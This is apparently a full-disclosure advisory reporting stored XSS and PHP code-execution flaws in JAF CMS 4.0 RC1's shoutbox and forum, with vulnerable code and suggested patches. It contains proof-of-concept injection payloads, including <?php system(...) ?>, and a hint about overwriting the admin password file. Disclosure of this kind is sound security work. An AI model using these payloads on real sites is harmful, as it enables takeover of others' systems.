<<< Date Index >>>     <<< Thread Index >>>

JAF CMS 4.0 RC1 multiple vulnerabilities



##################################################################################
##                                          ##          _    _  _    _          
##
##   Hacker:  NanoyMaster                   ##       /||  \ | || \  / ||\       
##
##   Exploit: JAF CMS                       ##      / || |\\| ||  \/  || \      
##
##   Version: 4.0 RC1                       ##      \ || | \  || |\/| || /      
##
##                                          ##       \||_|  \_||_|  |_||/       
##
##################################################################################
##   vulnerabilities:   XSS in shoutbox                                         
##
##                      PHP execution                                           
##
##                      XSS in forum                                            
##
##                                                                              
##
##################################################################################
##                             \m/___Props___\m/                                
##
##                                 z3r0phr34k                                   
##
##                               System_Meltdown                                
##
##                              THK-GEO & THK-h3x                               
##
##                             All of Exploitarians                             
##
##################################################################################


//------------------------------------------------------------------------------//
//                                  XSS in shoutbox                             
//
//------------------------------------------------------------------------------//

Self explanitory... in the message body put: <script>alert('hi')</script>

Error:  module/shout/jafshout.php
 Line:  168 - 202

187 - 191 {
$message = preg_replace('/"/','',$_POST['message']);
$message = preg_replace("/>/","&gt;",$_POST['message']);
$message = preg_replace("/</","&lt;",$_POST['message']);
$message = str_replace("onmouse","",$_POST['message']);
$message = str_replace("/\/","edited",$_POST['message']);
}

change the relevent lines to look like the following, bar the first 
$_POST['message'].

187 - 191 {
$message = preg_replace('/"/','',$message);
$message = preg_replace("/>/","&gt;",$message);
$message = preg_replace("/</","&lt;",$message);
$message = str_replace("onmouse","",$message);
$message = str_replace("/\/","edited",$message);
}
etc etc.

*note* 
        This should be implemented on all of the variables stored to the 
flat-file
        module/files/shout 
*end note*


//------------------------------------------------------------------------------//
//                                  PHP execution                               
//
//------------------------------------------------------------------------------//

Yet again in the shoutbox type something like:

Windoze) <?php system(dir); ?>  
  Linux) <?php system(ls -la); ?>
  
you could see how usefull this could be ;) possably overwright 
admin/data_inc.php
(where the admin's password hash is) :p
  
Error: module/shout/jafshout.php
 Line: 168 - 202
Patch: (see above code)


//------------------------------------------------------------------------------//
//                                  XSS in forum                                
//
//------------------------------------------------------------------------------//

Self explanitory... in the message body put: <script>alert('hi')</script>

Error:  module/forum/topicwin.php
 Line:  112- 123

112 - 117 {
        $n_topic["name"]=$name;
        $n_topic["email"]=$email;
        $n_topic["title"]=$title;
        $n_topic["date"]=$date;
        $n_topic["ldate"]=$date;
        $n_topic["lname"]=$name;
}

change the relevent lines to look like the following.

112 - 117 {
        $n_topic["name"]=htmlentities($name, ENT_QUOTES);
        $n_topic["email"]=htmlentities($email, ENT_QUOTES);
        $n_topic["title"]=htmlentities($title, ENT_QUOTES);
        $n_topic["date"]=htmlentities($date, ENT_QUOTES);
        $n_topic["ldate"]=htmlentities($date, ENT_QUOTES);
        $n_topic["lname"]=htmlentities($name, ENT_QUOTES);        
}
etc etc.

//------------------------------------------------------------------------------//
//                               End                                            
//
//------------------------------------------------------------------------------//